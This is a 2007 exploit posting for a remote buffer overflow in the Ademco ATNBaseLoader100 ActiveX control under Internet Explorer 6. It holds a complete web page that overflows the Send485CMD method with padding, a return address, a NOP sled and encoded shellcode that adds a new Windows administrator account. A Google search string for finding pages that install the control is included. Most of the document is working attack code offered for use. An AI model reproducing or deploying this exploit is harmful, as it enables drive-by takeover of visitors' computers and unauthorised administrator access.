ie6ademco-overflow.txt
Posted on 31 May 2007
!-- IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module ATNBaseLoader100.dll (5, 4, 0, 6) remote buffer overflow exploit / XP SP2 it version by rgod site: retrogod.altervista.org this activex is installed browsing some webcam pages try this google dork: intitle:"Browser Launch Page" (dork credit: dragg, found in GHDB) object safety report: RegKey Safe for Script: True RegkeySafe for Init: True KillBitSet: False here it is what happen, EIP is overwritten after 272 chars passed to Send485CMD method: EAX 00000001 ECX 0013EA7C ASCII "AAAA ... EDX 7EFF00E4 EBX 10007414 ESP 0013EB98 ASCII "AAAA ... EBP 41414141 ESI 0018022C EDI 00000000 EIP 41414141 SetLoginID, AddSite, SetScreen, SetVideoServer methods are also vulnerable to less convenient overflows or seh overwrite --> <HTML> <OBJECT CLASSID='clsid:4C1AB3D8-8107-4BC8-AEEE-38ECF8A94A12' ID='BaseRunner' ></OBJECT> <script language='vbscript'> 'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add SCODE = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP NOP= String(12, unescape("%90")) EIP= unescape("%03%78%41%7e") 'call ESP user32.dll SunTzu=String(272, "A") + EIP + NOP + SCODE BaseRunner.Send485CMD SunTzu </script> </HTML>